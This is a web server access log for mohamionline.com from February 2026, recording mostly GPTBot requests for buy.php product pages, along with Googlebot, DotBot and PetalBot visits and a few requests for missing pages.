74.7.242.31 - - [13/Feb/2026:17:12:10 +0000] "GET /buy.php?detail/04501472204805 HTTP/1.1" 200 121107 "https://mohamionline.com/buy.php?detail/25903432163335" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:12:12 +0000] "GET /buy.php?goods/185033262 HTTP/1.1" 200 143181 "https://mohamionline.com/buy.php?detail/18503366639514" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:12:16 +0000] "GET /buy.php?detail/06002420790066 HTTP/1.1" 200 121536 "https://mohamionline.com/buy.php?detail/13403728532373" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:12:19 +0000] "GET /buy.php?jp/185033262.html HTTP/1.1" 200 143241 "https://mohamionline.com/buy.php?goods/185033262" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
66.249.66.160 - - [13/Feb/2026:17:12:23 +0000] "GET /header.php?merchandises/373109250538 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.242.31 - - [13/Feb/2026:17:12:22 +0000] "GET /buy.php?detail/25903549041265 HTTP/1.1" 200 131680 "https://mohamionline.com/buy.php?detail/25903432163335" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:12:25 +0000] "GET /buy.php?detail/26601801312348 HTTP/1.1" 200 120119 "https://mohamionline.com/buy.php?detail/06901210214508" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:12:29 +0000] "GET /buy.php?detail/18503330580502 HTTP/1.1" 200 128404 "https://mohamionline.com/buy.php?detail/18503366880440" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.244.66.200 - - [13/Feb/2026:17:12:35 +0000] "GET /index.php?option=com_k2&view=item&id=279%253a%25d8%25a7%25d9%2584%25d8%25a8%25d8%25a7%25d8%25a8-%25d8%25a7%25d9%2584%25d8%25ae%25d8%25a7%25d9%2585%25d8%25b3-%25d9%2585%25 HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
74.7.242.31 - - [13/Feb/2026:17:12:33 +0000] "GET /buy.php?detail/24704745893472 HTTP/1.1" 200 119599 "https://mohamionline.com/buy.php?detail/24701036167248" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:12:36 +0000] "GET /buy.php?detail/03201056128856 HTTP/1.1" 200 135165 "https://mohamionline.com/buy.php?detail/03200939459934" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:12:39 +0000] "GET /buy.php?detail/07104340333508 HTTP/1.1" 200 118487 "https://mohamionline.com/buy.php?detail/07101072480620" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:12:43 +0000] "GET /buy.php?detail/07104341421037 HTTP/1.1" 200 119307 "https://mohamionline.com/buy.php?detail/07101072480620" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:12:45 +0000] "GET /buy.php?detail/25903548654428 HTTP/1.1" 200 131207 "https://mohamionline.com/buy.php?detail/25903432163335" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:12:49 +0000] "GET /buy.php?detail/09100903802559 HTTP/1.1" 200 132730 "https://mohamionline.com/buy.php?detail/04501472204805" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:12:52 +0000] "GET /buy.php?detail/20503198582196 HTTP/1.1" 200 121388 "https://mohamionline.com/buy.php?goods/185033262" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:12:55 +0000] "GET /buy.php?detail/06002414690664 HTTP/1.1" 200 120843 "https://mohamionline.com/buy.php?detail/06002420790066" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:12:58 +0000] "GET /buy.php?detail/21101510716557 HTTP/1.1" 200 119775 "https://mohamionline.com/buy.php?jp/185033262.html" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:13:02 +0000] "GET /buy.php?detail/25903534987890 HTTP/1.1" 200 126243 "https://mohamionline.com/buy.php?detail/25903549041265" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:13:05 +0000] "GET /buy.php?detail/26602194605980 HTTP/1.1" 200 123544 "https://mohamionline.com/buy.php?detail/26601801312348" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:13:08 +0000] "GET /buy.php?detail/24701034831810 HTTP/1.1" 200 120826 "https://mohamionline.com/buy.php?detail/24704745893472" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
114.119.153.209 - - [13/Feb/2026:17:13:12 +0000] "GET /goods.php?shop/pg/216birth/20336 HTTP/1.1" 404 - "http://mohamionline.com/goods.php?sitemap803.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
69.30.223.218 - - [13/Feb/2026:17:13:13 +0000] "GET /wp-content/pla25a50/edit.php HTTP/1.1" 404 - "http://mohamionline.com/wp-content/pla25a50/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.242.31 - - [13/Feb/2026:17:13:10 +0000] "GET /buy.php?detail/07900307148605 HTTP/1.1" 200 129855 "https://mohamionline.com/buy.php?detail/19100196070331" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:13:14 +0000] "GET /buy.php?detail/19104728333560 HTTP/1.1" 200 119049 "https://mohamionline.com/buy.php?detail/07104813500041" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:13:17 +0000] "GET /buy.php?detail/03201055158551 HTTP/1.1" 200 135027 "https://mohamionline.com/buy.php?detail/03200939459934" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:13:20 +0000] "GET /buy.php?detail/06002413988056 HTTP/1.1" 200 120639 "https://mohamionline.com/buy.php?detail/06002420790066" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:13:23 +0000] "GET /buy.php?detail/09200707192023 HTTP/1.1" 200 119752 "https://mohamionline.com/buy.php?detail/09100903802559" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:13:26 +0000] "GET /buy.php?detail/20503277273544 HTTP/1.1" 200 119592 "https://mohamionline.com/buy.php?detail/20503198582196" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:13:29 +0000] "GET /buy.php?detail/08401663665588 HTTP/1.1" 200 133765 "https://mohamionline.com/buy.php?detail/06002414690664" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:13:32 +0000] "GET /buy.php?detail/19101744744167 HTTP/1.1" 200 120384 "https://mohamionline.com/buy.php?detail/09100903802559" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:13:36 +0000] "GET /buy.php?detail/25903585584659 HTTP/1.1" 200 127789 "https://mohamionline.com/buy.php?detail/25903534987890" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:13:39 +0000] "GET /buy.php?detail/25903586956911 HTTP/1.1" 200 127730 "https://mohamionline.com/buy.php?detail/25903534987890" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:13:42 +0000] "GET /buy.php?detail/18503326394543 HTTP/1.1" 200 146888 "https://mohamionline.com/buy.php?detail/18503366639514" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:13:46 +0000] "GET /buy.php?goods/079004468 HTTP/1.1" 200 121270 "https://mohamionline.com/buy.php?detail/07900307148605" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:13:50 +0000] "GET /buy.php?detail/19102193858954 HTTP/1.1" 200 119320 "https://mohamionline.com/buy.php?detail/19104728333560" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:13:54 +0000] "GET /buy.php?detail/03200867777534 HTTP/1.1" 200 125515 "https://mohamionline.com/buy.php?detail/03201055158551" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:13:57 +0000] "GET /buy.php?detail/01304702896290 HTTP/1.1" 200 119483 "https://mohamionline.com/buy.php?detail/26601801312348" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:14:00 +0000] "GET /buy.php?detail/09200899169115 HTTP/1.1" 200 122373 "https://mohamionline.com/buy.php?detail/09200707192023" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:14:03 +0000] "GET /buy.php?detail/26300970605812 HTTP/1.1" 200 118815 "https://mohamionline.com/buy.php?detail/26602194605980" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:14:06 +0000] "GET /buy.php?detail/03200867995177 HTTP/1.1" 200 135582 "https://mohamionline.com/buy.php?detail/03201055158551" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:14:09 +0000] "GET /buy.php?detail/11700327255544 HTTP/1.1" 200 121195 "https://mohamionline.com/buy.php?detail/19101744744167" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:14:13 +0000] "GET /buy.php?detail/25903594862023 HTTP/1.1" 200 124543 "https://mohamionline.com/buy.php?detail/25903585584659" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:14:16 +0000] "GET /buy.php?detail/25903525575276 HTTP/1.1" 200 128374 "https://mohamionline.com/buy.php?detail/25903586956911" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:14:19 +0000] "GET /buy.php?detail/10500122141652 HTTP/1.1" 200 119334 "https://mohamionline.com/buy.php?detail/09100903802559" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.244.66.200 - - [13/Feb/2026:17:14:22 +0000] "GET /index.php?option=com_k2&view=item&id=124:%D8%A7%D9%84%D8%A8%D8%A7%D8%A8-%D8%A7%D9%84%D8%B1%D8%A7%D8%A8%D8%B9-%D8%A7%D9%84%D8%A8%D8%A7%D8%A8-%D8%A7%D9%84%D8%AE%D8%A7%D9%85%D8%B3&count=41 HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
74.7.242.31 - - [13/Feb/2026:17:14:22 +0000] "GET /buy.php?detail/07900302974658 HTTP/1.1" 200 123954 "https://mohamionline.com/buy.php?goods/079004468" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.244.66.200 - - [13/Feb/2026:17:14:25 +0000] "GET /index.php?option=com_k2&view=item&id=351:%C3%83%CB%9C%C3%82/contact.php&cache=yes HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
51.91.250.17 - - [13/Feb/2026:17:14:27 +0000] "GET /index.php?option=com_k2&view=item&id=28:???????-??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
2001:41d0:404:200::5843 - - [13/Feb/2026:17:14:28 +0000] "GET /index.php?option=com_k2&view=item&id=28:???????-??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
74.7.242.31 - - [13/Feb/2026:17:14:25 +0000] "GET /buy.php?detail/10203922935524 HTTP/1.1" 200 119424 "https://mohamionline.com/buy.php?detail/07000668089954" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:14:28 +0000] "GET /buy.php?detail/12203824267292 HTTP/1.1" 200 119871 "https://mohamionline.com/buy.php?detail/12203890323386" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:14:31 +0000] "GET /buy.php?detail/18500444002648 HTTP/1.1" 200 121181 "https://mohamionline.com/buy.php?detail/01304702896290" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:14:34 +0000] "GET /buy.php?detail/09200950067136 HTTP/1.1" 200 122895 "https://mohamionline.com/buy.php?detail/09200899169115" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:14:37 +0000] "GET /buy.php?detail/09200950676101 HTTP/1.1" 200 122234 "https://mohamionline.com/buy.php?detail/09200899169115" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
114.119.155.180 - - [13/Feb/2026:17:14:41 +0000] "GET /goods.php?shop/pg/216accuracy/4774 HTTP/1.1" 404 - "http://mohamionline.com/goods.php?sitemap803.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
74.7.242.31 - - [13/Feb/2026:17:14:40 +0000] "GET /buy.php?detail/01304748181045 HTTP/1.1" 200 117175 "https://mohamionline.com/buy.php?detail/01304702896290" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:14:43 +0000] "GET /buy.php?detail/11700262322732 HTTP/1.1" 200 120451 "https://mohamionline.com/buy.php?detail/11700327255544" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:14:46 +0000] "GET /buy.php?detail/00402980287740 HTTP/1.1" 200 120626 "https://mohamionline.com/buy.php?detail/25903594862023" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:14:49 +0000] "GET /buy.php?detail/11700262143770 HTTP/1.1" 200 119100 "https://mohamionline.com/buy.php?detail/11700327255544" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:14:52 +0000] "GET /buy.php?detail/02200529773983 HTTP/1.1" 200 119024 "https://mohamionline.com/buy.php?detail/26402620828730" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:14:55 +0000] "GET /buy.php?detail/07900407759025 HTTP/1.1" 200 125823 "https://mohamionline.com/buy.php?detail/07900302974658" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:14:58 +0000] "GET /buy.php?detail/10202669137779 HTTP/1.1" 200 118819 "https://mohamionline.com/buy.php?detail/10203922935524" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:15:01 +0000] "GET /buy.php?detail/12203993351175 HTTP/1.1" 200 119129 "https://mohamionline.com/buy.php?detail/12203824267292" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:15:04 +0000] "GET /buy.php?goods/185004426 HTTP/1.1" 200 121459 "https://mohamionline.com/buy.php?detail/18500444002648" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:15:08 +0000] "GET /buy.php?detail/18500442101051 HTTP/1.1" 200 119735 "https://mohamionline.com/buy.php?detail/18500444002648" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:15:12 +0000] "GET /buy.php?detail/0920086646094 HTTP/1.1" 200 130263 "https://mohamionline.com/buy.php?detail/09200950676101" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:15:15 +0000] "GET /buy.php?detail/01302113229801 HTTP/1.1" 200 118029 "https://mohamionline.com/buy.php?detail/01304748181045" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:15:18 +0000] "GET /buy.php?detail/16802258418444 HTTP/1.1" 200 133822 "https://mohamionline.com/buy.php?detail/11700262322732" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:15:21 +0000] "GET /buy.php?goods/013021132 HTTP/1.1" 200 119785 "https://mohamionline.com/buy.php?detail/01302113229801" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
49.51.245.241 - - [13/Feb/2026:17:15:26 +0000] "GET /195499__fc72c33/?C=M;O=A HTTP/1.1" 200 655 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
74.7.242.31 - - [13/Feb/2026:17:15:24 +0000] "GET /buy.php?detail/09200866271097 HTTP/1.1" 200 122364 "https://mohamionline.com/buy.php?detail/09200950676101" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:15:27 +0000] "GET /buy.php?detail/22004934722673 HTTP/1.1" 200 121369 "https://mohamionline.com/buy.php?detail/00402980287740" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:15:30 +0000] "GET /buy.php?detail/09200946932012 HTTP/1.1" 200 122649 "https://mohamionline.com/buy.php?detail/09200950067136" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:15:33 +0000] "GET /buy.php?detail/27502982300529 HTTP/1.1" 200 119192 "https://mohamionline.com/buy.php?detail/11700262322732" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:15:36 +0000] "GET /buy.php?detail/09200867208034 HTTP/1.1" 200 122655 "https://mohamionline.com/buy.php?detail/09200950676101" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:15:40 +0000] "GET /buy.php?goods/271003761 HTTP/1.1" 200 125139 "https://mohamionline.com/buy.php?detail/12203993351175" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:15:43 +0000] "GET /buy.php?detail/19502222462364 HTTP/1.1" 200 118343 "https://mohamionline.com/buy.php?detail/01304748181045" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:15:46 +0000] "GET /buy.php?detail/01302113557629 HTTP/1.1" 200 117900 "https://mohamionline.com/buy.php?detail/01304748181045" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:15:50 +0000] "GET /buy.php?detail/12203756693512 HTTP/1.1" 200 121878 "https://mohamionline.com/buy.php?detail/12203993351175" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:15:54 +0000] "GET /buy.php?detail/19703886854887 HTTP/1.1" 200 157363 "https://mohamionline.com/buy.php?goods/185004426" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
114.119.155.180 - - [13/Feb/2026:17:15:58 +0000] "GET /goods.php?shop/pg/215what/20087 HTTP/1.1" 404 - "http://mohamionline.com/goods.php?sitemap803.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
74.7.242.31 - - [13/Feb/2026:17:15:57 +0000] "GET /buy.php?detail/0130473559593 HTTP/1.1" 200 119013 "https://mohamionline.com/buy.php?goods/013021132" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:16:00 +0000] "GET /buy.php?detail/22203777612894 HTTP/1.1" 200 121095 "https://mohamionline.com/buy.php?detail/16802258418444" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:16:03 +0000] "GET /buy.php?detail/01304735888657 HTTP/1.1" 200 119209 "https://mohamionline.com/buy.php?goods/013021132" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:16:06 +0000] "GET /buy.php?detail/09200709981396 HTTP/1.1" 200 120007 "https://mohamionline.com/buy.php?detail/09200866271097" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:16:09 +0000] "GET /buy.php?detail/17103261959393 HTTP/1.1" 200 122877 "https://mohamionline.com/buy.php?detail/09200950067136" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:16:13 +0000] "GET /buy.php?detail/00403016976485 HTTP/1.1" 200 149789 "https://mohamionline.com/buy.php?detail/00402980287740" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:16:16 +0000] "GET /buy.php?detail/18500442403696 HTTP/1.1" 200 120331 "https://mohamionline.com/buy.php?detail/18500444002648" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:16:19 +0000] "GET /buy.php?detail/09100839349477 HTTP/1.1" 200 122413 "https://mohamionline.com/buy.php?detail/09100903802559" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:16:23 +0000] "GET /buy.php?detail/013021949043 HTTP/1.1" 200 118375 "https://mohamionline.com/buy.php?detail/01302113557629" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:16:26 +0000] "GET /buy.php?detail/12204010817212 HTTP/1.1" 200 124804 "https://mohamionline.com/buy.php?detail/12203756693512" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:16:29 +0000] "GET /buy.php?detail/12204012488572 HTTP/1.1" 200 117913 "https://mohamionline.com/buy.php?detail/12203756693512" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:16:33 +0000] "GET /buy.php?detail/03200939141364 HTTP/1.1" 200 127994 "https://mohamionline.com/buy.php?jp/032007033.html" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:16:37 +0000] "GET /buy.php?goods/133043794 HTTP/1.1" 200 127892 "https://mohamionline.com/buy.php?detail/22203777612894" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.31 - - [13/Feb/2026:17:16:40 +0000] "GET /buy.php?detail/22203016298020 HTTP/1.1" 200 145684 "https://mohamionline.com/buy.php?detail/22203777612894" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
